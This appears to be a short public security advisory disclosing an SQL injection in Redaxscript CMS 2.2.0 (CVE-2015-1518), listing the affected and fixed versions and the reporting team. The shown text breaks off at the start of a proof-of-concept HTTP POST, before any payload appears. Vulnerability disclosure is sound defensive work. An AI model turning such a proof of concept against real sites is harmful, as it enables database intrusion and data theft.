Redaxscript CMS 2.2.0 – SQL Injection vulnerability

Posted by ITAS Team on Feb 12

#Vulnerability title: Redaxscript CMS 2.2.0 – SQL Injection vulnerability
#Vendor: http://redaxscript.com/
#Product: Redaxscript CMS
#Software link: http://redaxscript.com/download/releases
#Affected version: Redaxscript 2.2.0
#Fixed version: Redaxscript 2.3.0
#CVE ID: CVE-2015-1518
#Author: Pham Kien Cuong (cuong.k.pham () itas vn) & ITAS Team (www.itas.vn)

:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent:…
